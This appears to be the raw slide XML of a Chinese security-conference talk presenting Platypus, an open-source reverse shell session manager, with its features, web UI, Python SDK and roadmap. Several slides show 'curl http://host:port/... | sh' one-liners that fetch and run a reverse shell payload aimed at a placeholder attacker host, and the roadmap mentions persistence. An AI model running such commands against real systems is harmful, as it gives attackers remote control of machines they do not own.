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414" r:id="rId2"/>
    <p:sldId id="270" r:id="rId3"/>
    <p:sldId id="262" r:id="rId4"/>
    <p:sldId id="287" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="415" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="275" r:id="rId13"/>
    <p:sldId id="277" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="417" r:id="rId20"/>
    <p:sldId id="418" r:id="rId21"/>
    <p:sldId id="268" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="282" r:id="rId24"/>
    <p:sldId id="283" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="284" r:id="rId27"/>
    <p:sldId id="285" r:id="rId28"/>
    <p:sldId id="416" r:id="rId29"/>
    <p:sldId id="412" r:id="rId30"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Adobe Gothic Std B" panose="020B0800000000000000" pitchFamily="34" charset="-128"/>
      <p:bold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scadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId41"/>
      <p:bold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55"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="DC9100"/>
    <a:srgbClr val="6E6E6E"/>
    <a:srgbClr val="2FEFFF"/>
    <a:srgbClr val="C3C3C3"/>
    <a:srgbClr val="366DAA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40" y="108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="220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封面 202104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75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封面 202104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76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pt封面 202104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99" y="0"/>
            <a:ext cx="12188825" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="预览图_千图网_编号3520186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281940"/>
            <a:ext cx="518160" cy="51816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77800" dist="228600" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="2A188E">
                <a:alpha val="10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375F35-79C7-4AC6-B428-63C79F5D9362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865668" y="6391394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ea typeface="Adobe Gothic Std B" panose="020B0800000000000000" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https://github.com/WangYihang/Platypus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B629B2-29FE-4977-991F-9CB65EC149A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10927828" y="5311394"/>
            <a:ext cx="1080000" cy="1080000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https://github.com/WangYihang/Platypus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https://github.com/WangYihang/Platypus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7C797-D1A0-4515-AE09-829CF65C7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83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https://github.com/WangYihang/Platypus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7C797-D1A0-4515-AE09-829CF65C72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4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https://github.com/WangYihang/Platypus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ost:port/attacker-host/attacker-port" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://host:port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Yihang/Platypus" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WangYihang/Platypus/release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2150" y="2015490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1675" y="2825115"/>
            <a:ext cx="577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4000" b="1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安全：数字化改革之根基</a:t>
            </a:r>
            <a:endParaRPr sz="40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1675" y="3511550"/>
            <a:ext cx="33648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ea"/>
                <a:sym typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>西湖论剑·网络安全大会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1675" y="4283710"/>
            <a:ext cx="5770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网安兵工厂 （Cyber Security Arsenal） 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首届国产优秀网络安全工具主题展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 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工具：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Platypus -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多会话交互式主机管理器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演讲人：哈尔滨工业大学  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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Lilac CTF </a:t>
            </a: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战队 王一航</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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j-ea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2820" y="2153920"/>
            <a:ext cx="344551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 Narrow" panose="020B0606020202030204" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CYBERSECURITY : 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 Narrow" panose="020B0606020202030204" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THE FOUNDATION OF DIGITAL REFORM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选择主机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D599DE-8607-43EB-BD71-674FFD6555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7" y="1466221"/>
            <a:ext cx="9199586" cy="5154552"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22601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获取裸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell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（如：</a:t>
            </a:r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60B844-2B4E-4E4F-AC7B-FB4A535BDC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93" y="1465920"/>
            <a:ext cx="9326196" cy="5225492"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120165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交互式 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell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7BC90DC-BA0D-4CE6-AD8D-EE28593467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1526051"/>
            <a:ext cx="11798300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文件上传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F6FD84-2AC7-45B9-AC83-5F076C0B92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78" y="1432976"/>
            <a:ext cx="9343362" cy="5235110"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383918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文件下载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0BDC64-97F6-4EDB-B034-FD3757BE87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05" y="1516135"/>
            <a:ext cx="9182390" cy="5144917"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428745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运行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6875FB-9DC5-4B5C-90CC-50FE936B06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336" y="1517381"/>
            <a:ext cx="11973328" cy="49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添加监听端口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F10DA38-2307-4A5D-B5B2-14BD2AB936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1314450"/>
            <a:ext cx="11552237" cy="5435600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233972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主机上线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AEDE76F-92CC-44F0-92D2-FABCFAAD04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438959"/>
            <a:ext cx="9359900" cy="5197475"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1307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交互式 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell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3FB36B-D0D6-4CC5-BFD2-569B4CF5A0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7" y="1388306"/>
            <a:ext cx="7956550" cy="5195887"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200048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4857-8018-4208-AF5D-58AE0160AA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="608013"/>
            <a:ext cx="10969625" cy="70643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加密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3BF93A-C318-41F4-9C3B-62A557348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60" y="1552633"/>
            <a:ext cx="8395504" cy="49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6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8D6B2-9E60-45C0-BFC8-8346FF057B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简介 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Platypus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9209C8-DBFC-4E12-8729-C187B1F84D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3958" y="1587553"/>
            <a:ext cx="10969625" cy="4759325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一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>款</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>终端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>与 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web UI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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>管理工具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为解决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Netcat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Socat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等工具在文件传输、多会话管理方面的不足。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该工具在多会话管理的基础上增加了在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>日常维护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>功能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如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zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件上传下载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zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可交互式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFE955"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web UI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Shell as a Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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 RESTful API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对工具进行操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Python SDK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可以更方便灵活地对反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会话进行管理。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96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4857-8018-4208-AF5D-58AE0160AA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="608013"/>
            <a:ext cx="10969625" cy="70643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交互方式（二）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web UI – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密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A35569A-4704-4CA7-BDCD-27CF3225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05" y="1504329"/>
            <a:ext cx="9514390" cy="48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5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11DF3-11AB-48BB-8F15-D64BE3BABF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415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用更易用的脚本语言（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rgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自动化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>管理所有主机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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr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11DF3-11AB-48BB-8F15-D64BE3BABF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9569" y="822448"/>
            <a:ext cx="10969625" cy="4759325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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pip install platypus-python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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接后端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2F78F5-9B41-4BBA-8A1B-D41FC133FD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41437" y="1717651"/>
            <a:ext cx="9509125" cy="44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02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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>新建服务器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9AC26-5FD4-473C-8949-FF06B2B8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13" y="2393003"/>
            <a:ext cx="10050574" cy="32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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 列服务器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881EBF-A95B-4607-8FF8-1E1271D8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41" y="1690688"/>
            <a:ext cx="10129918" cy="45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5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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>列主机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4C4ED-2EFD-4C99-8D8C-0A895494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13" y="1605064"/>
            <a:ext cx="8567174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7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交互方式（三）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Python SDK – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下发命令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09EAC-1C3B-47C7-BD39-5385F77F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21" y="2130357"/>
            <a:ext cx="9171158" cy="36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开发计划 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; We need your help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DAAD311-FFFC-4873-8940-64FD81C031C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477962" y="1544553"/>
            <a:ext cx="7067351" cy="512814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[WIP] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>私有协议设计与自定义客户端实现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加密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文件系统 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持久化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PTY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提升到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Meterpreter Shell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[WIP] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>提供除 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>外的语言 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SDK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golang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nodejs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java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记录所有用户操作日志（类似 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asciinema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，可以复盘回放）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前端优化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Logo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设计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AutoShape 2" descr="Accidental American Struggle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949C4403-F8E3-42C0-AA82-7BDFA3D678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The famous &quot;I Want You&quot; World War I poster by James Montgomery Flagg.  #AmericanArt #illustration | American illustration, James montgomery flagg,  Illustration">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF0C792-9A8F-40BF-830E-F1A58C80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34" y="1577675"/>
            <a:ext cx="3384666" cy="370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288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01675" y="2015490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2021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1675" y="2825115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4000" b="1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谢谢您的观看指导</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="40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!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1675" y="3511550"/>
            <a:ext cx="33648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ea"/>
                <a:sym typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>西湖论剑·网络安全大会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42820" y="2153920"/>
            <a:ext cx="344551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 Narrow" panose="020B0606020202030204" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CYBERSECURITY : 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 Narrow" panose="020B0606020202030204" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THE FOUNDATION OF DIGITAL REFORM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60326" y="5455426"/>
            <a:ext cx="1873188" cy="1206174"/>
            <a:chOff x="223750" y="2163586"/>
            <a:chExt cx="1873188" cy="120617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551731" y="2163586"/>
              <a:ext cx="938566" cy="93856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23750" y="3123539"/>
              <a:ext cx="18731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</a:rPr>
                <a:t>扫码了解更多西湖论剑资讯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A66E3D-399A-4B72-A09B-A1787055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03392">
            <a:off x="2403205" y="-1134431"/>
            <a:ext cx="8922209" cy="59439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A9F0C2-FF80-4902-AF9F-76415C87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6" y="-31632"/>
            <a:ext cx="5055123" cy="3668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B3040D-6B69-49CF-A3AF-99176420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52816">
            <a:off x="495086" y="1369887"/>
            <a:ext cx="8763450" cy="27560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E22754-107E-49AF-8D1C-03350A26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7606">
            <a:off x="422057" y="4584844"/>
            <a:ext cx="8909508" cy="2025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229A10-CEFD-46E2-8E18-05A1BC878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097" y="3219145"/>
            <a:ext cx="8953960" cy="2127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77E62F-6D3F-45F6-A1A3-2837B2092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92998">
            <a:off x="1673693" y="1742693"/>
            <a:ext cx="8871406" cy="5080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63990A-393E-4CFF-AF77-E42924051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2221">
            <a:off x="2614098" y="3477655"/>
            <a:ext cx="8826954" cy="2070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7D8C70-70B7-4567-875F-9862AE9100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85935">
            <a:off x="-1218319" y="343652"/>
            <a:ext cx="8922209" cy="49659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EFAAA6-4BD3-4CC8-AEF8-7CF4B7FB5D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功能（一）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Shell as 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B086-000A-4D87-ADEC-FB550A3E09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3738" y="1688964"/>
            <a:ext cx="10969625" cy="475932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无须再记忆繁琐的反弹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令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FAAA6-4BD3-4CC8-AEF8-7CF4B7FB5D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特性（一）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Shell as 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B086-000A-4D87-ADEC-FB550A3E09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2375" y="1375606"/>
            <a:ext cx="10969625" cy="4759325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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默认使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bash</a:t>
            </a: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curl </a:t>
            </a:r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http://host:port/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh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curl </a:t>
            </a:r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http://host:port/attacker-host/attacker-port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh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也可以选择其他语言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curl http://host:port/python | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh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curl http://host:port/php | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh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curl http://host:port/perl | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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9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FAAA6-4BD3-4CC8-AEF8-7CF4B7FB5D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特性（二）：交互式 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell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B086-000A-4D87-ADEC-FB550A3E09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2375" y="1490662"/>
            <a:ext cx="10969625" cy="475932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想</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>像使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
